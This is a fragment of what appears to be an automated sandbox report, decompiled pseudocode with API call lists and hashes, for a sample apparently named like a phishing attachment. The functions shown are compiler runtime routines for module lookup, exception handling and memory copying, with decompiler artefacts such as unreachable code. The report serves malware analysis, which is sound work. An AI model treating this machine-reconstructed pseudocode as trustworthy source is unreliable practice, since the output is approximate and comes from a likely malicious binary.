    								} else {
    									_t159 =  *(_t169 - 0x940);
    									__eflags = _t159 - 0x400;
    									if(__eflags > 0) {
    										L17:
    										_t75 = E00EA3CD7(_t169 - 0x944, _t166, _t159);
    										_t166 =  *(_t169 - 0x944);
    									} else {
    										_t113 = E00EA11AE(_t119, _t159, _t159, 0, __eflags);
    										__eflags = _t113;
    										if(_t113 == 0) {
    											goto L17;
    										} else {
    											E00EB02F0(_t159);
    											_t75 = _t172;
    										}
    									}
    									_t158 = _t159 >> 1;
    									_t76 = E00EA121E(_t75, _t169 - 0x114, _t159 >> 1, 3);
    									 *(_t169 - 0x948) = _t76;
    									__eflags = _t76;
    									if(_t76 != 0) {
    										E00EA14EE(_t169 - 0x93c, _t76);
    										__eflags = _t119;
    										if(_t119 == 0) {
    											L25:
    											_t158 = 0x22;
    											 *(_t169 - 0x52c) = _t158;
    											_t82 = E00EA1105(_t169 - 0x52a, 0x416, _t169 - 0x93c, 2 + E00EA75E7(_t169 - 0x93c) * 2);
    											_t172 = _t172 + 0xc;
    											__eflags = _t82;
    											if(_t82 == 0) {
    												_t84 = E00EA75E7(_t169 - 0x52c);
    												_pop(_t135);
    												 *(_t169 + _t84 * 2 - 0x52c) = _t158;
    												_t85 = 2 + _t84 * 2;
    												__eflags = _t85 - 0x418;
    												if(_t85 >= 0x418) {
    													E00EA43FC();
    													asm("int3");
    													_push(_t119);
    													_push(_t166);
    													_push(_t158);
    													_t160 = _t135;
    													__eflags = 0;
    													 *_t160 = 0xeb6168;
    													_t167 = _t160 + 0x10;
    													 *((intOrPtr*)(_t160 + 4)) = 0;
    													 *((intOrPtr*)(_t160 + 8)) = 0;
    													 *((intOrPtr*)(_t160 + 0xc)) = 0;
    													E00EA5210(_t160, _t167, 0, 0x18);
    													 *((char*)(_t167 + 0x18)) = 0;
    													return _t160;
    												} else {
    													__eflags = 0;
    													 *((short*)(_t169 + _t85 - 0x52c)) = 0;
    													_t89 = _t169 - 0x52c;
    													goto L31;
    												}
    											} else {
    												__eflags = _t166;
    												if(_t166 != 0) {
    													do {
    														_t158 =  *_t166;
    														_t166 = _t158;
    														E00EA7188(_t166);
    														__eflags = _t158;
    													} while (_t158 != 0);
    												}
    												_t165 = 0x80004005;
    												goto L9;
    											}
    										} else {
    											__eflags = _t119 - GetModuleHandleA(0);
    											if(__eflags == 0) {
    												goto L25;
    											} else {
    												_t89 = _t169 - 0x93c;
    												L31:
    												_push(_t89);
    												_push(L"Module");
    												_push(_t169 - 0x978);
    												_t91 = E00EA1A54(_t119, _t158, _t166, __eflags);
    												_t122 = _t91;
    												__eflags = _t91;
    												if(__eflags >= 0) {
    													_push(_t169 - 0x93c);
    													_push(L"Module_Raw");
    													_push(_t169 - 0x978);
    													_t119 = E00EA1A54(_t122, _t158, _t166, __eflags);
    													__eflags = _t119;
    													if(_t119 >= 0) {
    														_t119 =  *(_t169 - 0x94c);
    														__eflags = _t119;
    														if(_t119 == 0) {
    															L52:
    															__eflags = _t166;
    															if(_t166 != 0) {
    																do {
    																	_t158 =  *_t166;
    																	_t166 = _t158;
    																	E00EA7188(_t166);
    																	__eflags = _t158;
    																} while (_t158 != 0);
    															}
    															goto L21;
    														} else {
    															 *(_t169 - 0x940) = E00EA74D0(_t119) + 1;
    															_t98 = E00EA1181(_t169 - 0x940, E00EA74D0(_t119) + 1);
    															_t174 = _t172 + 4;
    															__eflags = _t98;
    															if(_t98 < 0) {
    																goto L52;
    															} else {
    																_t162 =  *(_t169 - 0x940);
    																__eflags = _t162 - 0x400;
    																if(__eflags > 0) {
    																	L44:
    																	_t99 = E00EA3CD7(_t169 - 0x944, _t166, _t162);
    																	_t166 =  *(_t169 - 0x944);
    																} else {
    																	_t105 = E00EA11AE(_t119, _t162, _t162, _t166, __eflags);
    																	__eflags = _t105;
    																	if(_t105 == 0) {
    																		goto L44;
    																	} else {
    																		E00EB02F0(_t162);
    																		_t99 = _t174;
    																	}
    																}
    																_t158 = _t162 >> 1;
    																_t140 = _t99;
    																_t100 = E00EA121E(_t140, _t119, _t162 >> 1, 3);
    																__eflags = _t100;
    																if(_t100 == 0) {
    																	goto L52;
    																} else {
    																	__eflags =  *(_t169 + 8);
    																	_t156 =  *(_t169 - 0x948);
    																	_push(_t140);
    																	_push(_t100);
    																	_t141 = _t169 - 0x978;
    																	if(__eflags == 0) {
    																		_t101 = E00EA2049(_t119, _t141, _t156, _t158, _t166, __eflags);
    																	} else {
    																		_t101 = E00EA1E71(_t119, _t141, _t156, _t158, _t166, __eflags);
    																	}
    																	_t119 = _t101;
    																	__eflags = _t166;
    																	if(_t166 != 0) {
    																		do {
    																			_t158 =  *_t166;
    																			_t166 = _t158;
    																			E00EA7188(_t166);
    																			__eflags = _t158;
    																		} while (_t158 != 0);
    																	}
    																	E00EA19FE(_t169 - 0x978, _t158);
    																}
    															}
    														}
    													} else {
    														__eflags = _t166;
    														if(_t166 != 0) {
    															do {
    																_t158 =  *_t166;
    																_t166 = _t158;
    																E00EA7188(_t166);
    																__eflags = _t158;
    															} while (_t158 != 0);
    														}
    														goto L34;
    													}
    												} else {
    													__eflags = _t166;
    													if(_t166 != 0) {
    														do {
    															_t158 =  *_t166;
    															_t166 = _t158;
    															E00EA7188(_t166);
    															__eflags = _t158;
    														} while (_t158 != 0);
    													}
    													L34:
    													_t165 = _t119;
    													goto L9;
    												}
    												L10:
    												return E00EB01C5(_t119, _t158, _t165);
    											}
    										}
    									} else {
    										__eflags = _t166;
    										if(_t166 != 0) {
    											do {
    												_t158 =  *_t166;
    												_t166 = _t158;
    												E00EA7188(_t166);
    												__eflags = _t158;
    											} while (_t158 != 0);
    										}
    										goto L21;
    									}
    								}
    							} else {
    								_t165 = 0x8007007a;
    								goto L9;
    							}
    						} else {
    							_t63 = E00EA12C0();
    							goto L8;
    						}
    					}
    				}
    			}





































    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA340C
      • Part of subcall function 00EA10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10CB
      • Part of subcall function 00EA10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10D5
    • GetModuleFileNameA.KERNEL32(00EA0000,?,00000104), ref: 00EA3494
    • _strlen.LIBCMT ref: 00EA34D2
    • __alloca_probe_16.LIBCMT ref: 00EA350D
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 00EA3574
    • _strlen.LIBCMT ref: 00EA368D
    • __alloca_probe_16.LIBCMT ref: 00EA36CC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: Module__alloca_probe_16_strlen$CriticalErrorFileH_prolog3_HandleInitializeLastNameSection
    • String ID: Module$Module_Raw
    • API String ID: 3573513912-3885325121
    • Opcode ID: 7cf2019a0424e86e2cabca32ea0cd0a7fa759ff8527d6d5c012a6b7263a69e1e
    • Instruction ID: 3292c8928d3c7327ce408e31a8a57a57fdd992b945d9d9e1e159c94c2296ade1
    • Opcode Fuzzy Hash: 7cf2019a0424e86e2cabca32ea0cd0a7fa759ff8527d6d5c012a6b7263a69e1e
    • Instruction Fuzzy Hash: 05919272E0162857EB21DA748C41BEE72A89F9E324F152195F949BF242DA30FF458B90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00EA5570(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				int _v32;
    				void* _v36;
    				void* _v40;
    				char* __edi;
    				intOrPtr* __esi;
    				int _t150;
    				signed int _t157;
    				intOrPtr _t158;
    				void* _t159;
    				intOrPtr* _t160;
    				intOrPtr _t162;
    				void* _t165;
    				signed int _t167;
    				void _t175;
    				void _t176;
    				int _t178;
    				unsigned int _t179;
    				int _t180;
    				int _t191;
    				intOrPtr* _t195;
    				intOrPtr _t196;
    				signed int _t200;
    				char _t202;
    				int _t206;
    				unsigned int _t207;
    				int _t208;
    				int _t210;
    				int _t215;
    				signed int _t226;
    				unsigned int _t230;
    				int _t231;
    				int _t233;
    				signed int _t239;
    				void* _t240;
    				intOrPtr _t241;
    				void* _t243;
    				signed int _t251;
    				intOrPtr _t258;
    				void* _t260;
    				void* _t263;
    				void* _t264;
    				void* _t265;
    				intOrPtr* _t267;
    				int _t271;
    				void* _t275;
    				void* _t277;
    				void* _t287;
    
    				_t221 = __edx;
    				_t195 = _a4;
    				_push(_t240);
    				_v5 = 0;
    				_v16 = 1;
    				 *_t195 = E00EB06BB(__ecx,  *_t195);
    				_t196 = _a8;
    				_t6 = _t196 + 0x10; // 0x11
    				_t258 = _t6;
    				_push(_t258);
    				_v20 = _t258;
    				_v12 =  *(_t196 + 8) ^  *0xeb9008;
    				E00EA5530(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0xeb9008);
    				E00EA6C3C(_a12);
    				_t150 = _a4;
    				_t277 = _t275 - 0x1c + 0x10;
    				_t241 =  *((intOrPtr*)(_t196 + 0xc));
    				if(( *(_t150 + 4) & 0x00000066) != 0) {
    					__eflags = _t241 - 0xfffffffe;
    					if(_t241 != 0xfffffffe) {
    						_t221 = 0xfffffffe;
    						E00EA6DC0(_t196, 0xfffffffe, _t258, 0xeb9008);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t150;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
    					if(_t241 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t200 = _v12;
    							_t157 = _t241 + (_t241 + 2) * 2;
    							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
    							_t158 = _t200 + _t157 * 4;
    							_t201 =  *((intOrPtr*)(_t158 + 4));
    							_v24 = _t158;
    							if( *((intOrPtr*)(_t158 + 4)) == 0) {
    								_t202 = _v5;
    								goto L7;
    							} else {
    								_t221 = _t258;
    								_t159 = E00EA6D60(_t201, _t258);
    								_t202 = 1;
    								_v5 = 1;
    								_t287 = _t159;
    								if(_t287 < 0) {
    									_v16 = 0;
    									L13:
    									_push(_t258);
    									E00EA5530(_t196, _t221, _t241, _t258, _v12);
    									goto L14;
    								} else {
    									if(_t287 > 0) {
    										_t160 = _a4;
    										__eflags =  *_t160 - 0xe06d7363;
    										if( *_t160 == 0xe06d7363) {
    											__eflags =  *0xeb13e4;
    											if(__eflags != 0) {
    												_t191 = E00EB00C0(__eflags, "jS�");
    												_t277 = _t277 + 4;
    												__eflags = _t191;
    												if(_t191 != 0) {
    													_t271 =  *0xeb13e4; // 0xea536a
    													 *0xeb1278(_a4, 1);
    													 *_t271();
    													_t258 = _v20;
    													_t277 = _t277 + 8;
    												}
    												_t160 = _a4;
    											}
    										}
    										_t222 = _t160;
    										E00EA6DA0(_t160, _a8, _t160);
    										_t162 = _a8;
    										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
    										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
    											_t222 = _t241;
    											E00EA6DC0(_t162, _t241, _t258, 0xeb9008);
    											_t162 = _a8;
    										}
    										_push(_t258);
    										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
    										E00EA5530(_t196, _t222, _t241, _t258, _v12);
    										E00EA6D80();
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										_push(_t241);
    										_push(_t258);
    										_t260 = _v36;
    										_t206 = _v32;
    										_t243 = _v40;
    										_t165 = _t260 + _t206;
    										__eflags = _t243 - _t260;
    										if(_t243 <= _t260) {
    											L25:
    											__eflags = _t206 - 0x20;
    											if(_t206 < 0x20) {
    												L96:
    												_t207 = _t206 & 0x0000001f;
    												__eflags = _t207;
    												if(_t207 != 0) {
    													_t167 = _t207;
    													_t208 = _t207 >> 2;
    													__eflags = _t208;
    													while(_t208 != 0) {
    														 *_t243 =  *_t260;
    														_t243 = _t243 + 4;
    														_t260 = _t260 + 4;
    														_t208 = _t208 - 1;
    														__eflags = _t208;
    													}
    													_t210 = _t167 & 0x00000003;
    													__eflags = _t210;
    													while(_t210 != 0) {
    														 *_t243 =  *_t260;
    														_t260 = _t260 + 1;
    														_t243 = _t243 + 1;
    														_t210 = _t210 - 1;
    														__eflags = _t210;
    													}
    												}
    												goto L102;
    											} else {
    												__eflags = _t206 - 0x80;
    												if(__eflags >= 0) {
    													asm("bt dword [0xfe2728], 0x1");
    													if(__eflags >= 0) {
    														__eflags = (_t243 ^ _t260) & 0x0000000f;
    														if(__eflags != 0) {
    															L33:
    															asm("bt dword [0xfe2728], 0x0");
    															if(__eflags >= 0) {
    																goto L58;
    															} else {
    																__eflags = _t243 & 0x00000003;
    																if((_t243 & 0x00000003) != 0) {
    																	goto L58;
    																} else {
    																	__eflags = _t260 & 0x00000003;
    																	if(__eflags == 0) {
    																		asm("bt edi, 0x2");
    																		if(__eflags < 0) {
    																			_t176 =  *_t260;
    																			_t206 = _t206 - 4;
    																			__eflags = _t206;
    																			_t260 = _t260 + 4;
    																			 *_t243 = _t176;
    																			_t243 = _t243 + 4;
    																		}
    																		asm("bt edi, 0x3");
    																		if(__eflags < 0) {
    																			asm("movq xmm1, [esi]");
    																			_t206 = _t206 - 8;
    																			__eflags = _t206;
    																			_t260 = _t260 + 8;
    																			asm("movq [edi], xmm1");
    																			_t243 = _t243 + 8;
    																		}
    																		__eflags = _t260 & 0x00000007;
    																		if(__eflags == 0) {
    																			asm("movdqa xmm1, [esi-0x8]");
    																			_t263 = _t260 - 8;
    																			do {
    																				asm("movdqa xmm3, [esi+0x10]");
    																				_t206 = _t206 - 0x30;
    																				asm("movdqa xmm0, [esi+0x20]");
    																				asm("movdqa xmm5, [esi+0x30]");
    																				_t263 = _t263 + 0x30;
    																				__eflags = _t206 - 0x30;
    																				asm("movdqa xmm2, xmm3");
    																				asm("palignr xmm3, xmm1, 0x8");
    																				asm("movdqa [edi], xmm3");
    																				asm("movdqa xmm4, xmm0");
    																				asm("palignr xmm0, xmm2, 0x8");
    																				asm("movdqa [edi+0x10], xmm0");
    																				asm("movdqa xmm1, xmm5");
    																				asm("palignr xmm5, xmm4, 0x8");
    																				asm("movdqa [edi+0x20], xmm5");
    																				_t243 = _t243 + 0x30;
    																			} while (_t206 >= 0x30);
    																			_t260 = _t263 + 8;
    																		} else {
    																			asm("bt esi, 0x3");
    																			if(__eflags >= 0) {
    																				asm("movdqa xmm1, [esi-0x4]");
    																				_t264 = _t260 - 4;
    																				do {
    																					asm("movdqa xmm3, [esi+0x10]");
    																					_t206 = _t206 - 0x30;
    																					asm("movdqa xmm0, [esi+0x20]");
    																					asm("movdqa xmm5, [esi+0x30]");
    																					_t264 = _t264 + 0x30;
    																					__eflags = _t206 - 0x30;
    																					asm("movdqa xmm2, xmm3");
    																					asm("palignr xmm3, xmm1, 0x4");
    																					asm("movdqa [edi], xmm3");
    																					asm("movdqa xmm4, xmm0");
    																					asm("palignr xmm0, xmm2, 0x4");
    																					asm("movdqa [edi+0x10], xmm0");
    																					asm("movdqa xmm1, xmm5");
    																					asm("palignr xmm5, xmm4, 0x4");
    																					asm("movdqa [edi+0x20], xmm5");
    																					_t243 = _t243 + 0x30;
    																				} while (_t206 >= 0x30);
    																				_t260 = _t264 + 4;
    																				while(1) {
    																					L51:
    																					__eflags = _t206 - 0x10;
    																					if(__eflags < 0) {
    																						break;
    																					}
    																					asm("movdqu xmm1, [esi]");
    																					_t206 = _t206 - 0x10;
    																					_t260 = _t260 + 0x10;
    																					asm("movdqa [edi], xmm1");
    																					_t243 = _t243 + 0x10;
    																				}
    																				asm("bt ecx, 0x2");
    																				if(__eflags < 0) {
    																					_t175 =  *_t260;
    																					_t206 = _t206 - 4;
    																					__eflags = _t206;
    																					_t260 = _t260 + 4;
    																					 *_t243 = _t175;
    																					_t243 = _t243 + 4;
    																				}
    																				asm("bt ecx, 0x3");
    																				if(__eflags < 0) {
    																					asm("movq xmm1, [esi]");
    																					__eflags = _t206;
    																					_t260 = _t260 + 8;
    																					asm("movq [edi], xmm1");
    																					_t243 = _t243 + 8;
    																				}
    																				goto __eax;
    																			}
    																			asm("movdqa xmm1, [esi-0xc]");
    																			_t265 = _t260 - 0xc;
    																			do {
    																				asm("movdqa xmm3, [esi+0x10]");
    																				_t206 = _t206 - 0x30;
    																				asm("movdqa xmm0, [esi+0x20]");
    																				asm("movdqa xmm5, [esi+0x30]");
    																				_t265 = _t265 + 0x30;
    																				__eflags = _t206 - 0x30;
    																				asm("movdqa xmm2, xmm3");
    																				asm("palignr xmm3, xmm1, 0xc");
    																				asm("movdqa [edi], xmm3");
    																				asm("movdqa xmm4, xmm0");
    																				asm("palignr xmm0, xmm2, 0xc");
    																				asm("movdqa [edi+0x10], xmm0");
    																				asm("movdqa xmm1, xmm5");
    																				asm("palignr xmm5, xmm4, 0xc");
    																				asm("movdqa [edi+0x20], xmm5");
    																				_t243 = _t243 + 0x30;
    																			} while (_t206 >= 0x30);
    																			_t260 = _t265 + 0xc;
    																		}
    																		goto L51;
    																	}
    																}
    															}
    															goto L60;
    														} else {
    															asm("bt dword [0xeb9010], 0x1");
    															if(__eflags < 0) {
    																_t178 = _t260 & 0x0000000f;
    																__eflags = _t178;
    																if(_t178 != 0) {
    																	_push(_t206 - 0x10);
    																	_t179 = 0x10 - _t178;
    																	_t215 = _t179 & 0x00000003;
    																	__eflags = _t215;
    																	while(_t215 != 0) {
    																		 *_t243 =  *_t260;
    																		_t260 = _t260 + 1;
    																		_t243 = _t243 + 1;
    																		_t215 = _t215 - 1;
    																		__eflags = _t215;
    																	}
    																	_t180 = _t179 >> 2;
    																	__eflags = _t180;
    																	while(_t180 != 0) {
    																		 *_t243 =  *_t260;
    																		_t260 = _t260 + 4;
    																		_t243 = _t243 + 4;
    																		_t180 = _t180 - 1;
    																		__eflags = _t180;
    																	}
    																	_pop(_t206);
    																}
    																_t230 = _t206;
    																_t206 = _t206 & 0x0000007f;
    																_t231 = _t230 >> 7;
    																__eflags = _t231;
    																while(_t231 != 0) {
    																	asm("movdqa xmm0, [esi]");
    																	asm("movdqa xmm1, [esi+0x10]");
    																	asm("movdqa xmm2, [esi+0x20]");
    																	asm("movdqa xmm3, [esi+0x30]");
    																	asm("movdqa [edi], xmm0");
    																	asm("movdqa [edi+0x10], xmm1");
    																	asm("movdqa [edi+0x20], xmm2");
    																	asm("movdqa [edi+0x30], xmm3");
    																	asm("movdqa xmm4, [esi+0x40]");
    																	asm("movdqa xmm5, [esi+0x50]");
    																	asm("movdqa xmm6, [esi+0x60]");
    																	asm("movdqa xmm7, [esi+0x70]");
    																	asm("movdqa [edi+0x40], xmm4");
    																	asm("movdqa [edi+0x50], xmm5");
    																	asm("movdqa [edi+0x60], xmm6");
    																	asm("movdqa [edi+0x70], xmm7");
    																	_t260 = _t260 + 0x80;
    																	_t243 = _t243 + 0x80;
    																	_t231 = _t231 - 1;
    																	__eflags = _t231;
    																}
    																goto L92;
    															} else {
    																goto L33;
    															}
    														}
    													} else {
    														memcpy(_t243, _t260, _t206);
    														return _v40;
    													}
    												} else {
    													asm("bt dword [0xeb9010], 0x1");
    													if(__eflags < 0) {
    														L92:
    														__eflags = _t206;
    														if(_t206 != 0) {
    															_t233 = _t206 >> 5;
    															__eflags = _t233;
    															if(_t233 != 0) {
    																do {
    																	asm("movdqu xmm0, [esi]");
    																	asm("movdqu xmm1, [esi+0x10]");
    																	asm("movdqu [edi], xmm0");
    																	asm("movdqu [edi+0x10], xmm1");
    																	_t260 = _t260 + 0x20;
    																	_t243 = _t243 + 0x20;
    																	_t233 = _t233 - 1;
    																	__eflags = _t233;
    																} while (_t233 != 0);
    															}
    															goto L96;
    														}
    														L102:
    														return _v40;
    													} else {
    														L58:
    														__eflags = _t243 & 0x00000003;
    														while((_t243 & 0x00000003) != 0) {
    															 *_t243 =  *_t260;
    															_t206 = _t206 - 1;
    															_t260 = _t260 + 1;
    															_t243 = _t243 + 1;
    															__eflags = _t243 & 0x00000003;
    														}
    														L60:
    														_t226 = _t206;
    														__eflags = _t206 - 0x20;
    														if(_t206 < 0x20) {
    															goto L96;
    														} else {
    															memcpy(_t243, _t260, _t206 >> 2 << 2);
    															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M00EA5934))) {
    																case 0:
    																	return _v40;
    																	goto L108;
    																case 1:
    																	 *__edi =  *__esi;
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 2:
    																	 *__edi =  *__esi;
    																	_t92 = __esi + 1; // 0xc0330cc4
    																	 *((char*)(__edi + 1)) =  *_t92;
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 3:
    																	 *__edi =  *__esi;
    																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
    																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    															}
    														}
    													}
    												}
    											}
    										} else {
    											__eflags = _t243 - _t165;
    											if(_t243 < _t165) {
    												_t267 = _t260 + _t206;
    												_t251 = _t243 + _t206;
    												__eflags = _t206 - 0x20;
    												if(__eflags < 0) {
    													L83:
    													__eflags = _t206 & 0xfffffffc;
    													while((_t206 & 0xfffffffc) != 0) {
    														_t251 = _t251 - 4;
    														_t267 = _t267 - 4;
    														 *_t251 =  *_t267;
    														_t206 = _t206 - 4;
    														__eflags = _t206 & 0xfffffffc;
    													}
    													__eflags = _t206;
    													if(_t206 != 0) {
    														do {
    															_t251 = _t251 - 1;
    															_t267 = _t267 - 1;
    															 *_t251 =  *_t267;
    															_t206 = _t206 - 1;
    															__eflags = _t206;
    														} while (_t206 != 0);
    													}
    													return _v40;
    												} else {
    													asm("bt dword [0xeb9010], 0x1");
    													if(__eflags < 0) {
    														__eflags = _t251 & 0x0000000f;
    														if((_t251 & 0x0000000f) != 0) {
    															do {
    																_t206 = _t206 - 1;
    																_t267 = _t267 - 1;
    																_t251 = _t251 - 1;
    																 *_t251 =  *_t267;
    																__eflags = _t251 & 0x0000000f;
    															} while ((_t251 & 0x0000000f) != 0);
    															while(1) {
    																L79:
    																__eflags = _t206 - 0x80;
    																if(_t206 < 0x80) {
    																	break;
    																}
    																_t267 = _t267 - 0x80;
    																_t251 = _t251 - 0x80;
    																asm("movdqu xmm0, [esi]");
    																asm("movdqu xmm1, [esi+0x10]");
    																asm("movdqu xmm2, [esi+0x20]");
    																asm("movdqu xmm3, [esi+0x30]");
    																asm("movdqu xmm4, [esi+0x40]");
    																asm("movdqu xmm5, [esi+0x50]");
    																asm("movdqu xmm6, [esi+0x60]");
    																asm("movdqu xmm7, [esi+0x70]");
    																asm("movdqu [edi], xmm0");
    																asm("movdqu [edi+0x10], xmm1");
    																asm("movdqu [edi+0x20], xmm2");
    																asm("movdqu [edi+0x30], xmm3");
    																asm("movdqu [edi+0x40], xmm4");
    																asm("movdqu [edi+0x50], xmm5");
    																asm("movdqu [edi+0x60], xmm6");
    																asm("movdqu [edi+0x70], xmm7");
    																_t206 = _t206 - 0x80;
    																__eflags = _t206 & 0xffffff80;
    																if((_t206 & 0xffffff80) != 0) {
    																	continue;
    																}
    																break;
    															}
    															__eflags = _t206 - 0x20;
    															if(_t206 >= 0x20) {
    																do {
    																	_t267 = _t267 - 0x20;
    																	_t251 = _t251 - 0x20;
    																	asm("movdqu xmm0, [esi]");
    																	asm("movdqu xmm1, [esi+0x10]");
    																	asm("movdqu [edi], xmm0");
    																	asm("movdqu [edi+0x10], xmm1");
    																	_t206 = _t206 - 0x20;
    																	__eflags = _t206 & 0xffffffe0;
    																} while ((_t206 & 0xffffffe0) != 0);
    															}
    															goto L83;
    														}
    														goto L79;
    													} else {
    														__eflags = _t251 & 0x00000003;
    														if((_t251 & 0x00000003) != 0) {
    															_t239 = _t251 & 0x00000003;
    															_t206 = _t206 - _t239;
    															__eflags = _t206;
    															do {
    																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
    																_t267 = _t267 - 1;
    																_t251 = _t251 - 1;
    																_t239 = _t239 - 1;
    																__eflags = _t239;
    															} while (_t239 != 0);
    														}
    														__eflags = _t206 - 0x20;
    														if(_t206 < 0x20) {
    															goto L83;
    														} else {
    															asm("std");
    															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
    															asm("cld");
    															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M00EA59E0))) {
    																case 0:
    																	return _v40;
    																	goto L108;
    																case 1:
    																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 2:
    																	_t113 = __esi + 3; // 0x33ebc033
    																	 *((char*)(__edi + 3)) =  *_t113;
    																	_t115 = __esi + 2; // 0xebc0330c
    																	 *((char*)(__edi + 2)) =  *_t115;
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 3:
    																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
    																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
    																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    															}
    														}
    													}
    												}
    											} else {
    												goto L25;
    											}
    										}
    									} else {
    										goto L7;
    									}
    								}
    							}
    							goto L108;
    							L7:
    							_t241 = _t196;
    						} while (_t196 != 0xfffffffe);
    						if(_t202 != 0) {
    							goto L13;
    						}
    						goto L14;
    					}
    				}
    				L108:
    			}

    APIs
    • _ValidateLocalCookies.LIBCMT ref: 00EA55A7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 00EA55AF
    • _ValidateLocalCookies.LIBCMT ref: 00EA5638
    • __IsNonwritableInCurrentImage.LIBCMT ref: 00EA5663
    • _ValidateLocalCookies.LIBCMT ref: 00EA56B8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: "G$csm$jS
    • API String ID: 1170836740-3336677713
    • Opcode ID: d9cc0c497c82d7b47a296211cae9fa5c9e5c7644157c0e2107afc4e00ab9d967
    • Instruction ID: 63797b3021276f2fae98f01537efd8813a9e2a74ddc47518c98d946148e0cc35
    • Opcode Fuzzy Hash: d9cc0c497c82d7b47a296211cae9fa5c9e5c7644157c0e2107afc4e00ab9d967
    • Instruction Fuzzy Hash: F341A235A006189FCF10DF68C884ADEBBF5AF8A328F549155E814BF352D731BA15CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00EA6111(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
    				signed char* _v0;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				void _v64;
    				signed int _v68;
    				char _v84;
    				intOrPtr _v88;
    				signed int _v92;
    				intOrPtr _v100;
    				void _v104;
    				intOrPtr* _v112;
    				signed char* _v184;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t201;
    				signed int _t202;
    				char _t203;
    				signed int _t205;
    				signed int _t207;
    				signed char* _t208;
    				signed int _t209;
    				signed int _t210;
    				signed int _t214;
    				void* _t217;
    				signed char* _t220;
    				void* _t222;
    				void* _t224;
    				signed char _t228;
    				signed int _t229;
    				void* _t231;
    				void* _t234;
    				void* _t237;
    				signed int _t247;
    				void* _t250;
    				intOrPtr* _t251;
    				signed int _t252;
    				intOrPtr _t253;
    				signed int _t254;
    				void* _t259;
    				void* _t264;
    				void* _t265;
